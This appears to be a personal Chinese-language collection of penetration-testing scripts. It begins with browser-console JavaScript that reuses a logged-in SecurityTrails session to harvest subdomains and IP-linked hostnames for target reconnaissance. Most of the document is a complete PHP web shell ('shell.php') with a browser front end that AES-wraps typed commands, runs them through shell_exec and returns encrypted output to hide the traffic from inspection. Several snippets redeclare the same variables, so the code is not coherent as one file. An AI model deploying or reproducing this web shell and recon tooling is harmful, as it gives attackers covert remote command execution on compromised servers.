用于记录工作中使用的一些脚本
渗透测试信息收集阶段使用的 SecurityTrails 反查脚本。在已登录 securitytrails.com 的页面上打开浏览器控制台，粘贴所需的函数并调用即可：请求使用相对路径，因此复用当前登录会话的 Cookie，结果输出到控制台。仅对授权范围内的目标使用。
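// Console snippet: dump the first-column link text of the first <tbody> on the page,
// one entry per line, then clear the buffer so the snippet can be re-run.
let str = "";
const tbody = document.querySelector('tbody');
// querySelector() returns null when the page has no table yet; treat that as no rows
// instead of throwing on tbody.getElementsByTagName.
const rows = tbody ? Array.from(tbody.getElementsByTagName('tr')) : [];
rows.forEach((row) => {
  const anchor = row.querySelector('td:first-child a');
  // Rows whose first cell has no link (header/placeholder rows) used to throw a
  // TypeError on `.innerText`; skip them.
  if (anchor) {
    str += `${anchor.innerText}\n`;
  }
});
console.log(str);
str = "";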
/**
 * Read the Next.js build id the page embeds in a `.hidden` element containing
 * "Build ID"; the `/_next/data/<buildId>/...` routes require it.
 * Returns "" when no such element exists or its markup has no '>' to split on.
 */
const Get_Token = () => {
  for (const node of document.getElementsByClassName('hidden')) {
    if (!node.innerHTML.includes('Build ID')) {
      continue;
    }
    // Same parse as before: the text after the first '>' of the element's innerHTML.
    return node.innerHTML.split('>')[1] || "";
  }
  return "";
};
/**
 * Append every hostname SecurityTrails lists under `Domain` to the shared `str`
 * buffer, following pagination while a page comes back full (100 records).
 * When the last page is reached the buffer is printed and reset to "".
 * Errors anywhere in the chain are logged with console.error.
 */
const Get_Subdomain = (Domain, Page = 1) => {
  const buildId = Get_Token();
  const url = `/_next/data/${buildId}/list/apex_domain/${Domain}.json?page=${Page}&domain=${Domain}`;
  fetch(url)
    .then((response) => response.json())
    .then(({ pageProps: { apexDomainData: { data: { records } } } }) => {
      for (const { hostname } of records) {
        str += `${hostname}\r\n`;
      }
      console.log(`Print Domain: ${Domain} Page: ${Page}`);
      if (records.length === 100) {
        Get_Subdomain(Domain, Page + 1);
      } else {
        console.log(str);
        str = "";
      }
    })
    .catch((error) => {
      console.error(`Error: ${error}`);
    });
};
// Shared output buffer for Get_Subdomain(); it is printed and cleared once the last page arrives.
let str = "";
// Example invocation: replace with the apex domain under test.
Get_Subdomain("douyin.com");
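/**
 * Append every hostname SecurityTrails lists for `IP` to the shared `str` buffer,
 * following pagination while a page comes back full (100 records); the buffer is
 * printed after the last page.
 * Fix: the original promise chain had no rejection handler, so a network or
 * response-shape error surfaced only as an unhandled rejection with no context.
 * It now logs the error the same way Get_Subdomain() does.
 */
const Get_IP_Affiliation_Domain = (IP, Page = 1) => {
  const Token = Get_Token();
  // NOTE(review): the trailing `&${IP}` has no parameter name, while the async
  // variant further down sends `&ip=${IP}`. Left as-is because the server-side
  // reader is not visible here.
  fetch(`/_next/data/${Token}/list/ip/${IP}.json?page=${Page}&${IP}`)
    .then((response) => response.json())
    .then(({ pageProps: { serverResponse: { data: { records } } } }) => {
      for (const { hostname } of records) {
        str = `${str}${hostname}\r\n`;
      }
      console.log(`Print IP: ${IP} Page: ${String(Page)}`);
      if (records.length === 100) {
        Get_IP_Affiliation_Domain(IP, Page + 1);
      } else {
        console.log(str);
      }
    })
    .catch((error) => {
      console.error(`Error: ${error}`);
    });
};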
/**
 * Read the Next.js build id the page embeds in a `.hidden` element containing
 * "Build ID"; the `/_next/data/<buildId>/...` routes require it.
 * Returns "" when no such element exists or its markup has no '>' to split on.
 */
const Get_Token = () => {
  for (const node of document.getElementsByClassName('hidden')) {
    if (!node.innerHTML.includes('Build ID')) {
      continue;
    }
    // Same parse as before: the text after the first '>' of the element's innerHTML.
    return node.innerHTML.split('>')[1] || "";
  }
  return "";
};
// Shared output buffer for Get_IP_Affiliation_Domain(); printed after the last page (not cleared).
let str = "";
// Example invocation: replace with the IP under test.
Get_IP_Affiliation_Domain("23.224.148.203");
/**
 * Append every hostname SecurityTrails lists under `Domain` to the global
 * `Subdomain_list_str`, recursing to the next page while a page is full (100).
 * Nothing is printed except a per-page progress line; the caller prints the buffer.
 */
const fetchSubdomainList = async (Domain, Page = 1) => {
  const buildId = Get_Token();
  const response = await fetch(`/_next/data/${buildId}/list/apex_domain/${Domain}.json?page=${Page}&domain=${Domain}`);
  const payload = await response.json();
  const records = payload.pageProps.apexDomainData.data.records;
  for (const { hostname } of records) {
    Subdomain_list_str += `${hostname}\r\n`;
  }
  console.log(`Print Subdomain: ${Domain} Page: ${String(Page)}`);
  if (records.length === 100) {
    await fetchSubdomainList(Domain, Page + 1);
  }
};
/**
 * Collect the hostnames SecurityTrails associates with `IP` into the global
 * `Primary_list_str` (paginating while a page is full), then, once the last page
 * is in, print that list and fetch the subdomain listing of every entry via
 * fetchSubdomainList(), which fills `Subdomain_list_str`.
 */
const Get_IP_Affiliation_Domain = async (IP, Page = 1) => {
  const buildId = Get_Token();
  const response = await fetch(`/_next/data/${buildId}/list/ip/${IP}.json?page=${Page}&ip=${IP}`);
  const payload = await response.json();
  const records = payload.pageProps.serverResponse.data.records;
  for (const { hostname } of records) {
    Primary_list_str += `${hostname}\r\n`;
  }
  console.log(`Print Domain: ${IP} Page: ${String(Page)}`);
  if (records.length === 100) {
    await Get_IP_Affiliation_Domain(IP, Page + 1);
    return;
  }
  console.log(Primary_list_str);
  // Only the final (non-full) page triggers the per-domain expansion; blank entries
  // from the trailing CRLF are dropped.
  const apexDomains = Primary_list_str.split("\r\n").filter((name) => name !== '');
  for (const apex of apexDomains) {
    await fetchSubdomainList(apex, 1);
  }
};
/**
 * Read the Next.js build id the page embeds in a `.hidden` element containing
 * "Build ID"; the `/_next/data/<buildId>/...` routes require it.
 * Returns "" when no such element exists or its markup has no '>' to split on.
 */
const Get_Token = () => {
  for (const node of document.getElementsByClassName('hidden')) {
    if (!node.innerHTML.includes('Build ID')) {
      continue;
    }
    // Same parse as before: the text after the first '>' of the element's innerHTML.
    return node.innerHTML.split('>')[1] || "";
  }
  return "";
};
/**
 * Convenience entry point: run the IP -> domains -> subdomains crawl for `IP`
 * and print the accumulated `Subdomain_list_str` once it has finished.
 */
const Get_IP_Affiliation_SubdomainAll = async (IP) => {
  const crawl = Get_IP_Affiliation_Domain(IP);
  await crawl;
  console.log(Subdomain_list_str);
};
// Output buffers filled by fetchSubdomainList() and Get_IP_Affiliation_Domain(). They are
// declared after the functions that use them; `var` hoisting makes that safe as long as the
// call below runs after these initialisations.
var Subdomain_list_str = "";
var Primary_list_str = "";
// Example invocation: replace with the IP under test.
Get_IP_Affiliation_SubdomainAll("77.77.77.77");
/**
 * Split "a.b.c.d/NN" into { ip, mask } (both strings). A missing "/" part yields
 * mask "24"; a present-but-empty one ("1.2.3.4/") yields "" exactly as before.
 */
const split_add = (ipAddress) => {
  const parts = ipAddress.split("/");
  const ip = parts[0];
  const mask = parts.length > 1 ? parts[1] : "24";
  return { ip, mask };
};
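/**
 * POST `mask=<mask>` to the range-splitting endpoint for `ip` and return the parsed
 * JSON reply.
 * Fixes: `async: false` and `dataType: "text"` were jQuery.ajax options that fetch()
 * silently ignores, so they are dropped; and a non-2xx reply now throws with its
 * status instead of failing later inside JSON parsing of an HTML error page.
 * @param {string} ip   address part of the range (no mask)
 * @param {string} mask prefix length as a string, e.g. "24"
 * @returns {Promise<object>} the decoded JSON body
 * @throws {Error} on a non-OK HTTP status or a non-JSON body
 */
const sendPostRequest = async (ip, mask) => {
  const url = `/api/public/app/api/vercel/ip/${ip}?mask=${mask}`;
  const response = await fetch(url, {
    method: "POST",
    body: `mask=${mask}`,
  });
  if (!response.ok) {
    throw new Error(`POST ${url} failed with status ${response.status}`);
  }
  // Equivalent to text() + JSON.parse: still rejects on a non-JSON body.
  return response.json();
};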
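/**
 * Append every hostname SecurityTrails lists for the IP in `Domain` to the shared
 * `str` buffer, following pagination while a page comes back full (100 records).
 * Reads the module-level `Token` (build id captured once when the snippet was pasted).
 * Fixes: `async: false` / `dataType: "text"` were jQuery-only options that fetch()
 * ignores and are removed; a non-OK status now throws with context instead of
 * failing inside JSON parsing of an HTML error page.
 * NOTE(review): `&${Domain}` has no parameter name (the sibling IP lookup sends
 * `&ip=`); left untouched because the server-side reader is not visible here.
 * @param {string} Domain IP address to look up (parameter name kept for callers)
 * @param {number} Page   1-based page number
 */
const Get_IP_To_Domain = async (Domain, Page = 1) => {
  const response = await fetch(`/_next/data/${Token}/list/ip/${Domain}.json?page=${Page}&${Domain}`);
  if (!response.ok) {
    throw new Error(`Request for ${Domain} page ${Page} failed with status ${response.status}`);
  }
  const { pageProps: { serverResponse: { data: { records } } } } = await response.json();
  for (const { hostname } of records) {
    str += `${hostname}\r\n`;
  }
  console.log(`Print Domain: ${Domain} Page: ${String(Page)}`);
  if (records.length === 100) {
    await Get_IP_To_Domain(Domain, Page + 1);
  }
};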
/**
 * Read the Next.js build id the page embeds in a `.hidden` element containing
 * "Build ID"; the `/_next/data/<buildId>/...` routes require it.
 * Returns "" when no such element exists or its markup has no '>' to split on.
 */
const Get_Token = () => {
  for (const node of document.getElementsByClassName('hidden')) {
    if (!node.innerHTML.includes('Build ID')) {
      continue;
    }
    // Same parse as before: the text after the first '>' of the element's innerHTML.
    return node.innerHTML.split('>')[1] || "";
  }
  return "";
};
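/**
 * Walk a CIDR range down to /32 hosts. A non-/32 input is expanded through the
 * range-splitting endpoint (sendPostRequest) and every sub-range with a non-zero
 * `sites` count is recursed into; a /32 with a non-zero site count is logged and
 * its hostnames are appended to `str` via Get_IP_To_Domain().
 * Fix: the original re-parsed `ip` (already stripped of its mask) with split_add,
 * so its `mask !== "32"` test always saw the "24" default and was dead code; the
 * site-count check is the real filter and is kept on its own.
 * @param {string} ipAddress "a.b.c.d" or "a.b.c.d/NN"
 * @param {number} [site]    site count reported for this range by the parent call
 */
const getSites = async (ipAddress, site) => {
  const { ip, mask: originalMask } = split_add(ipAddress);
  if (originalMask !== "32") {
    const jsonResponse = await sendPostRequest(ip, originalMask);
    // An unexpected reply shape still throws here rather than being skipped silently.
    const rows = jsonResponse.result.rows;
    for (const { sites, ip: subRange } of rows) {
      if (sites !== 0) {
        await getSites(subRange, sites);
      }
    }
    return;
  }
  if (site !== 0) {
    console.log(`ipAddress: ${ip} site: ${site}`);
    await Get_IP_To_Domain(ip);
  }
};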
// Output buffer for Get_IP_To_Domain(); Run() clears it before each walk and prints it after.
let str = "";
// Build id captured once at paste time; Get_IP_To_Domain() reads this module-level value
// instead of calling Get_Token() per request.
const Token = Get_Token();
/**
 * Entry point: reset the shared `str` buffer, walk `ipAddress` with getSites()
 * and print everything collected.
 */
const Run = async (ipAddress) => {
  str = "";
  const walk = getSites(ipAddress);
  await walk;
  console.log(str);
};
// Example invocation; a /32 skips the range expansion and goes straight to the hostname lookup.
Run("77.77.77.77/32");
<?php
// Remote command endpoint: reads a JSON body, AES-decrypts its `data` field with the
// key and IV supplied in that same body, and hands the result to shell_exec().
// NOTE(review): there is no authentication, origin check or command allow-list here,
// and because the key travels next to the ciphertext the AES layer only obscures the
// traffic from casual inspection -- anyone who can read the request can decrypt and
// forge it (CBC without a MAC also provides no integrity). Treat this as an
// unauthenticated command-execution endpoint running with the web server's privileges.
// Read the raw POST body.
$input = file_get_contents('php://input');
// Parse it as JSON into an associative array (null on malformed input).
$jsonObj = json_decode($input, true);
// Pull the base64-encoded ciphertext, IV and key out of the request; none is validated.
$encodedData = $jsonObj['data']; // assuming data was sent via POST request
$encodedIv = $jsonObj['iv']; // assuming iv was sent via POST request
$encodedKey = $jsonObj['key']; // assuming key was sent via POST request
// Debug: print iv, key and data.
// echo $encodedData . $encodedIv . $encodedKey;
// Undo the base64 transport encoding.
$decodedData = base64_decode($encodedData);
$decodedIv = base64_decode($encodedIv);
$decodedKey = base64_decode($encodedKey);
// AES-256-CBC decryption. openssl_decrypt() returns false on a bad key/IV length or a
// padding error, so $decryptedData is not guaranteed to be a string here.
$algorithm = "aes-256-cbc";
$decryptedData = openssl_decrypt($decodedData, $algorithm, $decodedKey, OPENSSL_RAW_DATA, $decodedIv);
// Execute the decrypted text as a shell command; `@` hides any warning and a false
// decryption result is passed through unchecked. $cmd_result is consumed further down.
$cmd_result = @shell_exec($decryptedData);
?>
<?php
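/**
 * Return $length bytes of cryptographically secure random data for key/IV material.
 *
 * Fix: the original silently fell back to mt_rand() -- a predictable, non-CSPRNG
 * generator -- whenever OpenSSL was unavailable, reported a weak source, or the host
 * was Windows. AES keys must never come from it, so this version prefers
 * random_bytes() (PHP >= 7), accepts OpenSSL output only when it reports a strong
 * source, and otherwise fails loudly instead of weakening the crypto.
 *
 * @param int $length number of bytes wanted; 0 or less returns "" as before
 * @return string raw binary string of exactly $length bytes
 * @throws RuntimeException when no secure random source is available
 */
function generateRandomBytes($length)
{
    // random_bytes(0) raises on PHP 8; keep the original's empty-string result.
    if ($length <= 0) {
        return '';
    }
    if (function_exists('random_bytes')) {
        // Throws itself if the runtime cannot find a secure source.
        return random_bytes($length);
    }
    // Older runtimes: accept OpenSSL output only when it reports a strong source.
    // The original's Windows exclusion is not needed once random_bytes() is preferred.
    if (function_exists('openssl_random_pseudo_bytes')) {
        $strong = false;
        $bytes = openssl_random_pseudo_bytes($length, $strong);
        if ($strong === true && $bytes !== false && strlen($bytes) === $length) {
            return $bytes;
        }
    }
    throw new RuntimeException('No cryptographically secure random source is available');
}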
// Encrypt the command output for the response. Runs only when the command produced
// truthy output: an empty string or "0" is dropped and $b64ciphertext stays unset.
if ($cmd_result) {
$key = generateRandomBytes(32); // AES-256 needs a 32-byte key (16/24/32 are the valid sizes)
$plaintext = $cmd_result; // raw shell output
$iv = generateRandomBytes(16); // fresh random IV per response
// echo "iv: " . $iv ;
// Debug: dump the IV as a byte array.
// $ivord = array_map('ord', str_split($iv));
// echo json_encode($ivord);
// echo "iv: " . $iv . "key: " . $key . "plaintext: " . $plaintext ;
$ciphertext = openssl_encrypt($plaintext, 'aes-256-cbc', $key, OPENSSL_RAW_DATA, $iv);
// Response layout (base64): 16-byte IV || 32-byte key || ciphertext; the browser side
// slices it apart at offsets 16 and 48. NOTE(review): shipping the key next to the
// ciphertext makes this an encoding rather than encryption -- it hides the output from a
// casual look at the page, not from anyone who captured the response -- and there is no MAC.
$b64ciphertext = base64_encode($iv . $key . $ciphertext);
} else {
// No output: nothing is emitted, so the page's JS receives an empty string for $b64ciphertext.
// echo "false";
}
?>
<?php $randomID = uniqid(); /* per-response suffix for the JS timer identifier below; uniqid() is time-based, which is fine for a name but not for anything secret */ ?>
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
<script>
// window.onload = function() {
// var b64ciphertext = "<?php echo $b64ciphertext; ?>";
// var result = document.getElementById('result');
// result.innerHTML = cryptoBase64ToStr(b64ciphertext);
// }
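// Polled once a second (see the setInterval below the function definitions) until the
// server response has been decrypted: cryptoBase64ToStr() decrypts asynchronously and
// returns undefined until window.plaintext has been populated.
// Fixes: the decrypted value is command output from the remote host, so it is now
// rendered with textContent instead of innerHTML (a crafted response could otherwise run
// script in the operator's browser); the implicit global `result_innerHTML` and the
// unused `result_new` are gone; the decrypt is kicked off once per tick, not twice.
function Discriminator() {
  var result = document.getElementById('result');
  var b64ciphertext = "<?php echo $b64ciphertext; ?>";
  var plaintext = cryptoBase64ToStr(b64ciphertext);
  if (plaintext == null) {
    result.textContent = ' ';
    return;
  }
  result.textContent = plaintext;
  console.log("timer<?php echo $randomID; ?>");
  // span_revise (defined below) stops the polling timer once the result span changes.
  // DOMSubtreeModified is a deprecated Mutation Event; MutationObserver is the replacement.
  var span_result = document.getElementById("result");
  span_result.addEventListener("DOMSubtreeModified", span_revise, false);
}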
// Base64-encode an ArrayBuffer (or typed array) via a Latin-1 binary string and btoa().
function arrayBufferToBase64(arrayBuffer) {
  const bytes = new Uint8Array(arrayBuffer);
  const binary = Array.from(bytes, (b) => String.fromCharCode(b)).join('');
  return window.btoa(binary);
}
// AES-CBC-encrypt the UTF-8 bytes of `data` under `key` (a CryptoKey) with the given
// 16-byte `iv`; resolves to the ciphertext ArrayBuffer (PKCS#7-padded by WebCrypto).
async function encryptData(data, key, iv) {
  const plaintextBytes = new TextEncoder().encode(data);
  const algorithm = { name: 'AES-CBC', iv };
  return window.crypto.subtle.encrypt(algorithm, key, plaintextBytes);
}
// Generate a fresh 256-bit AES-CBC CryptoKey (non-extractable, encrypt/decrypt).
// Side effect kept for the caller: the raw key bytes, base64-encoded, are stored in
// window.encodedKey_b64 so example() can ship them alongside the ciphertext.
async function generateKey() {
  const rawKey = window.crypto.getRandomValues(new Uint8Array(32));
  const cryptoKey = await window.crypto.subtle.importKey(
    "raw",
    rawKey,
    { name: "AES-CBC" },
    false,
    ["encrypt", "decrypt"],
  );
  window.encodedKey_b64 = cryptoKeyToBase64(rawKey);
  return cryptoKey;
}
// Base64-encode raw key bytes (ArrayBuffer or typed array) via a binary string.
function cryptoKeyToBase64(aesKey) {
  const bytes = new Uint8Array(aesKey);
  let binary = '';
  for (let i = 0; i < bytes.length; i++) {
    binary += String.fromCharCode(bytes[i]);
  }
  return btoa(binary);
}
// Decrypt a server response: base64 of IV (16 bytes) || key (32 bytes) || ciphertext,
// the layout produced by the PHP above.
// NOTE(review): decryption is asynchronous but this function returns synchronously, so
// the return value is whatever window.plaintext held BEFORE this call -- undefined on the
// first call and, typically, the previous response's text on later ones. Discriminator()
// polls it on a timer to paper over that race; a Promise-returning version would be the
// proper fix but would change every caller.
function cryptoBase64ToStr(result) {
const base64ToArrayBuffer = (base64String) => {
const binaryString = window.atob(base64String);
const bytes = new Uint8Array(binaryString.length);
for (let i = 0; i < binaryString.length; i++) {
bytes[i] = binaryString.charCodeAt(i);
}
return bytes.buffer;
};
const encryptedData = base64ToArrayBuffer(result); // base64 -> ArrayBuffer
const ivBuffer = encryptedData.slice(0, 16); // first 16 bytes: IV
const keyBuffer = encryptedData.slice(16, 48); // bytes 16..48: raw AES-256 key
const encryptedDataBuffer = encryptedData.slice(48); // remainder: ciphertext
const generateKey1 = (keyMaterial) => {
return window.crypto.subtle.importKey(
'raw',
keyMaterial, {
name: 'AES-CBC'
},
false,
['decrypt']
);
};
// Fire-and-forget: the result lands in window.plaintext whenever the decrypt finishes.
// The importKey await sits outside the try, so a bad key length surfaces as an
// unhandled rejection rather than through console.error.
(async () => {
const key = await generateKey1(keyBuffer); // import the AES key
try {
const decryptedData = await window.crypto.subtle.decrypt({ // AES-CBC decrypt
name: 'AES-CBC',
iv: ivBuffer
}, key, encryptedDataBuffer);
window.plaintext = new TextDecoder().decode(decryptedData); // bytes -> string
console.log(plaintext); // show the decrypted text
} catch (error) {
console.error(error); // decryption/padding failure
}
})();
return window.plaintext;
}
// Entry point for the submit button: encrypt the typed command with a fresh AES-256-CBC
// key and IV, POST ciphertext + IV + key (all base64) as JSON to shell.php, then pull the
// first <script> out of the HTML response and re-inject it so the new page's timer and
// Discriminator() run against the new ciphertext.
// NOTE(review): the key is sent in the same request as the ciphertext, so the encryption
// protects nothing against anyone who can read the traffic; and executing a <script>
// lifted from the response hands full control of this page to whatever answers at shell.php.
async function example() {
// Stop the current polling timer; its name carries the per-response suffix from PHP.
clearInterval(timer<?php echo $randomID; ?>);
// const data = "Hello, world!";
// Read the command text from the input box.
const data_value = document.getElementById("data").value;
// Fresh key (generateKey() also stores its base64 form in window.encodedKey_b64) and IV.
const key = await generateKey();
const iv = window.crypto.getRandomValues(new Uint8Array(16));
const encryptedData = await encryptData(data_value, key, iv);
// console.log(encryptedData);
// Base64-encode ciphertext and IV for transport; the key was encoded by generateKey().
const encryptedData_b64 = arrayBufferToBase64(encryptedData);
const encodeiv_b64 = arrayBufferToBase64(iv);
const encodedKey_b64 = window.encodedKey_b64;
// // Earlier fetch()-based upload, superseded by the XHR below:
// fetch('shell.php', {
// method: 'POST',
// headers: {
// 'Content-Type': 'application/json'
// },
// body: JSON.stringify({
// data: encryptedData_b64,
// iv: encodeiv_b64,
// key: encodedKey_b64
// })
// })
// // .then(response => response.text())
// .then(result => console.log(result))
// .catch(error => console.error(error));
// }
// JSON body: ciphertext, IV and the raw key, all base64.
var data = JSON.stringify({
data: encryptedData_b64,
iv: encodeiv_b64,
key: encodedKey_b64
});
// Plain XHR: the reply is an HTML page whose <script> is extracted below.
var xhr = new XMLHttpRequest();
// Request parameters.
xhr.open('POST', 'shell.php', true); // NOTE: replace with the real endpoint path
xhr.setRequestHeader('Content-Type', 'application/json');
// Response handler.
xhr.onload = function() {
if (xhr.status === 200) {
if (document.getElementById('Temporary')) {
// Drop the <script> injected by the previous response.
var elem = document.getElementById('Temporary');
elem.parentNode.removeChild(elem);
}
// Parse the response HTML in a detached div (scripts set via innerHTML do not execute).
var tempDiv = document.createElement('div');
tempDiv.innerHTML = xhr.responseText;
// Take the first <script> of the response and re-create it so it executes here.
var scriptTag = tempDiv.querySelector('script');
if (scriptTag) {
var scriptCode = scriptTag.innerHTML;
// A freshly created <script> runs when appended; tagged so the next round can remove it.
var scriptEl = document.createElement('script');
scriptEl.setAttribute("id", "Temporary");
scriptEl.innerHTML = scriptCode;
document.body.appendChild(scriptEl);
}
} else {
alert('Request failed. Error code: ' + xhr.status);
}
};
// Send it.
xhr.send(data);
}
// Start polling for the decrypted result. The identifier carries a per-response suffix so a
// script injected from a later response (see example()) declares its own timer binding.
let timer<?php echo $randomID; ?> = setInterval(Discriminator, 1000);
// Mutation-event handler: stop this response's polling timer once #result has changed.
// Declared again, identically, in the second <script> below; the later declaration wins.
function span_revise() {
clearInterval(timer<?php echo $randomID; ?>);
}
// example();
</script>
<input type="text" id="data" value="">
<input type="submit" value="提交" onclick="example()">
<span id='result'></span>
<script>
// Duplicate of the span_revise declared in the first <script>; same body, and as the
// later function declaration it is the one the listener below ends up calling.
function span_revise() {
clearInterval(timer<?php echo $randomID; ?>);
}
// Registered at load so the first DOM change to #result stops the polling timer.
// NOTE(review): DOMSubtreeModified is a deprecated Mutation Event (MutationObserver is the
// replacement), and Discriminator() also writes ' ' into the span while waiting, which this
// listener appears to treat as the result having arrived.
var span_result = document.getElementById("result");
span_result.addEventListener("DOMSubtreeModified", span_revise, false);
</script>
</body>
</html>